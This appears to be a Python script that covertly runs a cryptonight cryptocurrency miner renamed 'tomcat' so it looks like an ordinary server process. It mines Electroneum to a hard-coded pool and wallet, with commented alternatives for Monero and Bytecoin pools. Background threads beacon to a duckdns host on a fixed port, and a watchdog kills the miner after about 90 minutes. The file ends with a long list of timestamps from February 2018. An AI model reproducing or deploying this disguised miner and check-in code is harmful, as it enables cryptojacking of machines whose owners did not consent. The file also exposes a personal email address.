import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:11:05.793447
#2018-02-17 15:59:04.553934
#2018-02-17 17:47:07.323939
#2018-02-17 19:34:05.314742
#2018-02-17 21:23:06.329516
#2018-02-17 23:07:04.975102
#2018-02-18 00:54:05.079952
#2018-02-18 02:42:06.009942
#2018-02-18 04:31:05.533288
#2018-02-18 06:22:06.868989
#2018-02-18 08:12:04.506957
#2018-02-18 09:59:05.532882
#2018-02-18 11:47:05.248362
#2018-02-18 13:32:07.277577
#2018-02-18 15:23:04.228407
#2018-02-18 17:12:01.549916
#2018-02-18 18:59:07.338990
#2018-02-18 20:46:07.758309
#2018-02-18 22:32:05.184772
#2018-02-19 00:20:07.659370
#2018-02-19 02:06:07.422088
#2018-02-19 03:52:07.402376
#2018-02-19 05:37:06.469986
#2018-02-19 07:24:07.044467
#2018-02-19 09:14:08.028500
#2018-02-19 11:05:01.309171
#2018-02-19 12:52:05.732780
#2018-02-19 14:40:08.689773
#2018-02-19 16:28:02.024971
#2018-02-19 18:16:07.335568
#2018-02-19 20:02:04.760161
#2018-02-19 21:50:09.227124
#2018-02-19 23:36:05.648923
#2018-02-20 01:21:07.694175
#2018-02-20 03:11:05.279292
#2018-02-20 04:58:02.192262
#2018-02-20 06:41:03.920497
#2018-02-20 08:26:05.520871
#2018-02-20 10:11:08.057463
#2018-02-20 11:55:10.566179
#2018-02-20 13:42:10.393562
#2018-02-20 15:26:05.328354
#2018-02-20 17:13:08.111254
#2018-02-20 19:02:06.828767
#2018-02-20 20:50:06.701716
#2018-02-20 22:37:01.818505
#2018-02-21 00:19:07.393102
#2018-02-21 02:06:06.458749
#2018-02-21 05:00:11.004071
#2018-02-21 06:48:06.106567
#2018-02-21 08:35:08.964542
#2018-02-21 10:21:06.186752
#2018-02-21 12:08:11.067000
#2018-02-21 13:56:10.145973
#2018-02-21 15:41:01.735542
#2018-02-21 17:33:01.929654
#2018-02-21 19:19:02.040739
#2018-02-21 21:07:08.897063
#2018-02-21 22:55:05.239902
#2018-02-22 00:43:06.387496
#2018-02-22 02:31:06.737655
#2018-02-22 04:17:06.916020
#2018-02-22 06:04:06.416739
#2018-02-22 07:49:07.477203
#2018-02-22 09:38:08.530309
#2018-02-22 11:23:07.272764
#2018-02-22 13:10:01.508968
#2018-02-22 14:58:07.429953
#2018-02-22 16:44:06.717407
#2018-02-22 18:29:06.685686
#2018-02-22 20:22:06.624369
#2018-02-22 22:09:08.500814
#2018-02-22 23:55:06.958590
#2018-02-23 01:43:08.678443
#2018-02-23 03:33:01.873043
#2018-02-23 05:19:04.940466
#2018-02-23 07:05:09.203787
#2018-02-23 08:54:08.424616
#2018-02-23 11:12:07.251770
#2018-02-23 13:06:04.657034
#2018-02-23 14:51:03.916640
#2018-02-23 16:41:04.376230
#2018-02-23 18:29:06.600983
#2018-02-23 20:13:08.416134
#2018-02-23 22:02:04.162754
#2018-02-23 23:49:08.379118
#2018-02-24 01:40:06.951721
#2018-02-24 03:29:05.962385
#2018-02-24 05:14:07.517651
#2018-02-24 07:02:01.590133
#2018-02-24 08:35:04.563512
#2018-02-24 10:07:06.956843
#2018-02-24 11:52:05.220503
#2018-02-24 13:19:05.761501
#2018-02-24 14:53:01.489297
#2018-02-24 16:26:07.226711
#2018-02-24 18:02:03.945768
#2018-02-24 19:32:06.189420
#2018-02-24 21:08:05.816921
#2018-02-24 23:11:04.291474
#2018-02-25 01:32:05.935728
#2018-02-25 05:19:07.577559
#2018-02-25 11:32:02.035490